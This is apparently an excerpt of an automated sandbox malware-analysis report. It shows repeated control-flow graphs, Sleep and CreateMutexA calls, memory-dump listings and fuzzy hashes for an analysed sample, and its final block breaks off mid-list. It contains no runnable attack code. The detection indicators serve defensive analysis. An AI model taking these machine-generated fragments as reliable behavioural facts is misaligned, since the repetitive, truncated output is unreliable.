                                                                                                                                                                                                                                                  control_flow_graph 216 e7a418-e7a438 220 e7a466-e7a482 216->220 221 e7a43a-e7a446 216->221 224 e7a484-e7a490 220->224 225 e7a4b0-e7a4cf 220->225 222 e7a45c-e7a463 call e8d663 221->222 223 e7a448-e7a456 221->223 222->220 223->222 230 e7a93f-e7a949 call ea6c6a * 2 223->230 226 e7a4a6-e7a4ad call e8d663 224->226 227 e7a492-e7a4a0 224->227 228 e7a4d1-e7a4dd 225->228 229 e7a4fd-e7a916 call e880c0 225->229 226->225 227->226 227->230 233 e7a4f3-e7a4fa call e8d663 228->233 234 e7a4df-e7a4ed 228->234 247 e7a94e 230->247 248 e7a949 call ea6c6a 230->248 233->229 234->230 234->233 249 e7a953-e7a994 Sleep CreateMutexA 247->249 250 e7a94e call ea6c6a 247->250 248->247 252 e7a9a7-e7a9a8 249->252 253 e7a996-e7a998 249->253 250->249 253->252 254 e7a99a-e7a9a5 253->254 254->252
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00E7A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00ED3254), ref: 00E7A981
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_e70000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID: T2
                                                                                                                                                                                                                                                  • API String ID: 1464230837-631260391
                                                                                                                                                                                                                                                  • Opcode ID: aee317cbc463f04e706c56cc52c05a84bcb87eb13bed2c2017ce6b2b49851f9a
                                                                                                                                                                                                                                                  • Instruction ID: 877b5b68257a49456ca1534a8014ae65149692f31bde2ed08f6d9cd35b304e86
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aee317cbc463f04e706c56cc52c05a84bcb87eb13bed2c2017ce6b2b49851f9a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1316E717041009BEB08EB78ECCD76DB761DFC5324F28A628E01CBB2D5E77659848756

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 256 e7a54d-e7a56d 260 e7a56f-e7a57b 256->260 261 e7a59b-e7a5b7 256->261 262 e7a591-e7a598 call e8d663 260->262 263 e7a57d-e7a58b 260->263 264 e7a5e5-e7a604 261->264 265 e7a5b9-e7a5c5 261->265 262->261 263->262 268 e7a944-e7a949 call ea6c6a 263->268 266 e7a606-e7a612 264->266 267 e7a632-e7a916 call e880c0 264->267 270 e7a5c7-e7a5d5 265->270 271 e7a5db-e7a5e2 call e8d663 265->271 272 e7a614-e7a622 266->272 273 e7a628-e7a62f call e8d663 266->273 282 e7a94e 268->282 283 e7a949 call ea6c6a 268->283 270->268 270->271 271->264 272->268 272->273 273->267 286 e7a953-e7a994 Sleep CreateMutexA 282->286 287 e7a94e call ea6c6a 282->287 283->282 290 e7a9a7-e7a9a8 286->290 291 e7a996-e7a998 286->291 287->286 291->290 292 e7a99a-e7a9a5 291->292 292->290
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00E7A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00ED3254), ref: 00E7A981
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_e70000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID: T2
                                                                                                                                                                                                                                                  • API String ID: 1464230837-631260391
                                                                                                                                                                                                                                                  • Opcode ID: 2a55ed751b2994a6fc7c34ef5e95307c146d29049dc4bcabf36419d5298e47f6
                                                                                                                                                                                                                                                  • Instruction ID: 55e7d2b328739a9516587d9455d8b68ba5fb183c832ba5fb00a08c38771eab97
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a55ed751b2994a6fc7c34ef5e95307c146d29049dc4bcabf36419d5298e47f6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 813139717041008BEB08EB78ECC976DB762EBC5324F28962CE01CBB2D1C73589858712

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 294 e7a682-e7a6a2 298 e7a6a4-e7a6b0 294->298 299 e7a6d0-e7a6ec 294->299 300 e7a6c6-e7a6cd call e8d663 298->300 301 e7a6b2-e7a6c0 298->301 302 e7a6ee-e7a6fa 299->302 303 e7a71a-e7a739 299->303 300->299 301->300 306 e7a949 301->306 308 e7a710-e7a717 call e8d663 302->308 309 e7a6fc-e7a70a 302->309 304 e7a767-e7a916 call e880c0 303->304 305 e7a73b-e7a747 303->305 312 e7a75d-e7a764 call e8d663 305->312 313 e7a749-e7a757 305->313 310 e7a94e 306->310 311 e7a949 call ea6c6a 306->311 308->303 309->306 309->308 317 e7a953-e7a994 Sleep CreateMutexA 310->317 318 e7a94e call ea6c6a 310->318 311->310 312->304 313->306 313->312 326 e7a9a7-e7a9a8 317->326 327 e7a996-e7a998 317->327 318->317 327->326 328 e7a99a-e7a9a5 327->328 328->326
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00E7A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00ED3254), ref: 00E7A981
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_e70000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID: T2
                                                                                                                                                                                                                                                  • API String ID: 1464230837-631260391
                                                                                                                                                                                                                                                  • Opcode ID: cd1addb9a29f24e901e44e947b232343f69d7be8dfb48d8533fa8f1a8d736974
                                                                                                                                                                                                                                                  • Instruction ID: c266060ccbaa8f0181a77ba4f74fefdec7b051df2b1f5acf11f91afed1740e14
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd1addb9a29f24e901e44e947b232343f69d7be8dfb48d8533fa8f1a8d736974
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F3137717041008BEB08EB78ED89B6DB762DBC5320F28D62DE01CBB2D1D73589848752

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 330 e79adc-e79ae8 331 e79afe-e79d91 call e8d663 call e87a00 call e75c10 call e78b30 call e88220 call e87a00 call e75c10 call e78b30 call e88220 330->331 332 e79aea-e79af8 330->332 332->331 333 e7a917 332->333 335 e7a953-e7a994 Sleep CreateMutexA 333->335 336 e7a917 call ea6c6a 333->336 341 e7a9a7-e7a9a8 335->341 342 e7a996-e7a998 335->342 336->335 342->341 344 e7a99a-e7a9a5 342->344 344->341
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00E7A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00ED3254), ref: 00E7A981
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
